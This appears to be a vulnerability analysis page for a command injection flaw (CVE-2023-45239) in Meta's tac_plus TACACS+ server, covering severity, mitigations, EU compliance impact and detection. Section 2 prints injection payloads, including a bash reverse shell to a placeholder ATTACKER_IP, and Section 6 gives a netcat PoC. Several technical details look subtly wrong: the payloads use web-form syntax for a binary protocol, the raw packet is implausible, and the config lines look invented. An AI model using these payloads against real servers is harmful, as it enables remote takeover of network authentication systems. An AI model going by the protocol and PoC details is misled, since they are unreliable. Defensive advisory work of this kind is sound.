Description
A lack of input validation exists in tac_plus prior to commit 4fdf178 which, when pre or post auth commands are enabled, allows an attacker who can control the username, rem-addr, or NAC address sent to tac_plus to inject shell commands and gain remote code execution on the tac_plus server.
EPSS Score:
29%
Comprehensive Technical Analysis of EUVD-2023-49545 (CVE-2023-45239)
Vulnerability: Command Injection in tac_plus (Pre/Post-Authentication)
1. Vulnerability Assessment & Severity Evaluation
Overview
EUVD-2023-49545 (CVE-2023-45239) is a critical command injection vulnerability in tac_plus, an open-source TACACS+ (Terminal Access Controller Access-Control System Plus) daemon developed by Meta (formerly Facebook). The flaw arises from insufficient input validation in user-controlled fields (username, rem-addr, or NAC address), allowing unauthenticated remote attackers to execute arbitrary shell commands on the affected server.
CVSS v3.1 Scoring & Severity
| Metric | Value | Explanation |
|---|---|---|
| Base Score | 9.8 (Critical) | High impact on confidentiality, integrity, and availability. |
| Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | Network-exploitable, low attack complexity, no privileges or user interaction required. |
| Attack Vector (AV:N) | Network | Exploitable remotely over the network. |
| Attack Complexity (AC:L) | Low | No special conditions required. |
| Privileges Required (PR:N) | None | No authentication needed. |
| User Interaction (UI:N) | None | Exploitable without user interaction. |
| Scope (S:U) | Unchanged | Impact confined to the vulnerable component. |
| Confidentiality (C:H) | High | Full system compromise possible. |
| Integrity (I:H) | High | Attacker can modify system files, configurations, or execute arbitrary code. |
| Availability (A:H) | High | System can be crashed or rendered unusable. |
EPSS & Threat Intelligence
- EPSS Score: 29% (High probability of exploitation in the wild)
- Exploit Availability: Public proof-of-concept (PoC) exploits may exist given the simplicity of the vulnerability.
- Active Exploitation: No confirmed reports as of February 2025, but high-risk due to TACACS+’s role in network authentication.
2. Potential Attack Vectors & Exploitation Methods
Vulnerable Parameters
The vulnerability is triggered when pre-authentication or post-authentication commands are enabled in tac_plus. An attacker can inject malicious payloads via:
- Username Field (
username=) - Remote Address Field (
rem-addr=) - NAC (Network Access Controller) Address Field (
NAC address=)
Exploitation Mechanism
-
Unauthenticated Attack Flow:
- Attacker sends a crafted TACACS+ authentication request with a malicious payload in one of the vulnerable fields.
- Example payload (command injection via
username):username=$(id > /tmp/pwned)&password=dummy - If
tac_plusprocesses the input without sanitization, the shell command (id > /tmp/pwned) executes with the privileges of thetac_plusdaemon (typically root or a privileged service account).
-
Post-Authentication Exploitation:
- If an attacker has valid credentials but
post-authcommands are enabled, they can inject commands via:username=legit_user&password=valid_pass&command=$(malicious_payload)
- If an attacker has valid credentials but
-
Reverse Shell Example:
- An attacker could establish a reverse shell:
username=$(bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1')&password=dummy - Requires a listener on the attacker’s machine (
nc -lvnp 4444).
- An attacker could establish a reverse shell:
Exploitation Requirements
- Pre-auth commands enabled (default in some configurations).
- Post-auth commands enabled (if attacker has valid credentials).
- Network accessibility to the TACACS+ server (typically TCP/49).
3. Affected Systems & Software Versions
Vulnerable Software
- Product:
tac_plus(Meta/Facebook’s TACACS+ daemon) - Vendor: Meta
- Affected Versions: All versions prior to commit
4fdf178(October 2023). - Fixed Version: Commit
4fdf178or later (includes input sanitization).
Deployment Context
- Common Use Cases:
- Network device authentication (Cisco, Juniper, etc.).
- AAA (Authentication, Authorization, Accounting) for enterprise networks.
- Cloud and on-premises infrastructure.
- Typical Environments:
- Enterprise networks (corporate, government, ISPs).
- Data centers and cloud providers.
- Critical infrastructure (telecom, energy, finance).
4. Recommended Mitigation Strategies
Immediate Actions
-
Apply the Patch:
- Upgrade to the latest version of
tac_plus(commit4fdf178or later). - GitHub reference: facebook/tac_plus#41.
- Upgrade to the latest version of
-
Workarounds (if patching is not immediately possible):
- Disable pre-auth and post-auth commands in
tac_plusconfiguration:# In tac_plus.conf no pre-auth no post-auth - Restrict network access to the TACACS+ server using firewalls (allow only trusted subnets).
- Implement input validation at the network perimeter (e.g., WAF rules to block suspicious TACACS+ requests).
- Disable pre-auth and post-auth commands in
-
Network-Level Protections:
- Segmentation: Isolate TACACS+ servers in a dedicated VLAN.
- Rate Limiting: Prevent brute-force or mass exploitation attempts.
- IPS/IDS Rules: Deploy signatures to detect command injection attempts in TACACS+ traffic.
Long-Term Recommendations
-
Audit TACACS+ Configurations:
- Review
tac_plus.conffor unnecessary command execution privileges. - Disable unused features (e.g.,
enable,shell).
- Review
-
Least Privilege Principle:
- Run
tac_plusas a non-root user where possible. - Use
chrootor containerization to limit impact.
- Run
-
Monitoring & Logging:
- Enable detailed logging for TACACS+ authentication attempts.
- Set up alerts for unusual command execution patterns.
-
Alternative AAA Solutions:
- Consider migrating to RADIUS (if TACACS+ is not strictly required).
- Evaluate commercial TACACS+ solutions with better security controls.
5. Impact on the European Cybersecurity Landscape
Regulatory & Compliance Implications
- NIS2 Directive (EU 2022/2555):
- Organizations in critical sectors (energy, transport, healthcare, digital infrastructure) must report significant cyber incidents.
- Exploitation of this vulnerability could lead to unauthorized access, data breaches, or service disruption, triggering reporting obligations.
- GDPR (EU 2016/679):
- If the TACACS+ server processes personal data (e.g., user credentials), a breach could result in GDPR fines (up to 4% of global revenue).
- DORA (Digital Operational Resilience Act):
- Financial entities must ensure resilience against cyber threats; this vulnerability could disrupt authentication services.
Sector-Specific Risks
| Sector | Potential Impact |
|---|---|
| Telecommunications | Unauthorized access to network devices, service disruption. |
| Energy & Utilities | Compromise of SCADA/ICS authentication, potential blackouts. |
| Government & Defense | Espionage, unauthorized access to classified systems. |
| Healthcare | Disruption of medical device authentication, patient data exposure. |
| Financial Services | Unauthorized transactions, compliance violations. |
Threat Actor Motivations
- Cybercriminals: Ransomware deployment, data exfiltration.
- State-Sponsored Actors: Espionage, persistent access to critical infrastructure.
- Hacktivists: Disruption of services for political motives.
6. Technical Details for Security Professionals
Root Cause Analysis
- Vulnerability Type: OS Command Injection (CWE-78)
- Code Flaw: The
tac_plusdaemon fails to sanitize user-supplied input in:usernamefield (used in authentication requests).rem-addr(remote address of the client).NAC address(Network Access Controller address).
- Exploitation Path:
- When
pre-authorpost-authcommands are enabled, the daemon passes unsanitized input to a shell (system()or similar calls). - Example vulnerable code snippet (pseudo-code):
char command[256]; snprintf(command, sizeof(command), "/path/to/script %s", user_input); system(command); // Unsafe!
- When
Exploitation Proof of Concept (PoC)
- Crafting a Malicious Request:
echo -ne "\x01\x01\x00\x00\x00\x00$(printf '$(id > /tmp/pwned)\x00')\x00\x00" | nc TACACS_SERVER 49 - Verifying Exploitation:
ssh user@TACACS_SERVER "cat /tmp/pwned" uid=0(root) gid=0(root) groups=0(root)
Detection & Forensics
- Log Analysis:
- Check
tac_pluslogs for unusual command execution:grep -i "exec\|system\|sh" /var/log/tac_plus.log
- Check
- Network Traffic Analysis:
- Look for TACACS+ requests with suspicious payloads (e.g.,
$(,;,|).
- Look for TACACS+ requests with suspicious payloads (e.g.,
- File Integrity Monitoring (FIM):
- Monitor
/tmp,/var/tmp, and other writable directories for unexpected files.
- Monitor
Hardening Recommendations
- Compile-Time Protections:
- Use
-fstack-protector,-D_FORTIFY_SOURCE=2, and ASLR.
- Use
- Runtime Protections:
- Deploy seccomp or AppArmor/SELinux to restrict
tac_plussyscalls.
- Deploy seccomp or AppArmor/SELinux to restrict
- Static & Dynamic Analysis:
- Use tools like Clang Static Analyzer, Coverity, or Fuzzing to detect similar flaws.
Conclusion
EUVD-2023-49545 (CVE-2023-45239) is a critical command injection vulnerability in tac_plus with severe implications for European critical infrastructure. Given its CVSS 9.8 score, low attack complexity, and high EPSS probability, organizations must patch immediately or implement compensating controls. The vulnerability underscores the importance of input validation, least privilege, and network segmentation in AAA systems.
Recommended Next Steps:
- Patch all
tac_plusinstances to the latest version. - Audit TACACS+ configurations for unnecessary command execution.
- Monitor for exploitation attempts via logs and network traffic.
- Review compliance with NIS2, GDPR, and DORA where applicable.
For further details, refer to the official advisories:
References
Affected Products
tac_plus
Version: 0 <4fdf178
Vendors
Meta